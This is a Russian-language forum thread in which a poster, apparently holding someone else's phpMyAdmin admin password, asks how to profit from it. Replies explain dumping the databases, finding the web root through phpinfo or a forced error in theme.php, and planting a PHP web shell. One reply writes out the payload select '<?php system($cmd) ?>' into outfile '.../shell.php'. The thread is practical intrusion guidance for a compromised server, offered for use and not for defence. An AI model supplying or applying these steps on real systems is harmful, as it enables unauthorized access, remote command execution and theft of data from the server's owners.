Добрый день/вечер!

Аист принес мне записку, на которой был написан пароль от админки "phpMyAdmin 2.6.4-pl3".

Что можно сделать, кроме как понатыкать на разные кнопочки. Хочется поиметь какую-то выгоду...

С уважением.

сделай дамп баз... просмотреть базы можно коомандой Show Databases

шелл залей, если into outfile конечно разрешен.. вообще man sql!

а у яндекса слабо спросить? да хоть
_http://www.securitylab.ru/vulnerability/242774.php

шелл залей, если into outfile конечно разрешен.. вообще man sql!

А можно подрбно описать, как проверить разрешен или нет.

Я так понял, что нужно
SELECT * FROM table INTO OUTFILE 'путь_к_файлу/файл';

Только вот куда он запишет. Скорее всего он запишет его не в корене WWW-сервера и просмотреть его я не смогу. Нужно узнать полный путь - куда сохранять файл.

Как узнать этот путь?
Кому "+"

Там есть ссылочка "Показать информацию о PHP" глянь там есть путь в разделе "PHP Variables". Ну а дальше прикинь в какую папку может быть разрешена запись.

Узнаешь DOCUMENT_ROOT, потом
select '<?php system($cmd) ?>' from [table] into outfile '[DOCUMENT_ROOT]/shell.php'
Если хватит прав на запись ..

Попробуй зайти в файлик theme.php?themes=sosatpalec или theme и вылезет ошибка кароче, вот те и путь.


Поидее пароль рутовый должен быть чтобы инто оутфайл сделать.